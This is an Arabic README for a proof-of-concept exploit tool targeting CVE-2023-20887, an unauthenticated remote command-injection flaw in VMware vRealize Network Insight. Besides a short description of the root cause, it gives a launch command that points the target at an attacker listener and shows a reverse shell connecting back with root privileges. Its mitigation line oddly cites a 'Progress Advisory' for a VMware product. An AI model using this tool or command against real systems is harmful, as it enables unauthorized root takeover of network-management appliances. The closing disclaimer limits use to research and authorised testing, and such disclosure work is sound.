
VMWare vRealize Network Insight ثغرة RCE قبل المصادقة (CVE-2023-20887)
POC لـ CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) استغلال تنفيذ برمجيات عن بُعد غير مصادق عليه
يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) معرضة لحقن الأوامر عند قبول إدخال المستخدم عبر واجهة Apache Thrift RPC. تسمح هذه الثغرة لمهاجم عن بُعد غير مصادق عليه بتنفيذ أوامر عشوائية على نظام التشغيل الأساسي بصلاحيات مستخدم root. واجهة RPC محمية بواسطة وكيل عكسي يمكن تجاوزه. قيّمت VMware خطورة هذه المشكلة ضمن نطاق حرج (Critical) بحد أقصى للدرجة الأساسية CVSSv3 يبلغ 9.8. يمكن للجهة الخبيثة الحصول على تنفيذ برمجيات عن بُعد في سياق المستخدم 'root' على الجهاز. إصدارات VMware 6.x معرضة للخطر.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
قم بالتحديث إلى أحدث إصدار أو خفّف الأثر باتباع التعليمات الواردة في نشرة Progress Advisory
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.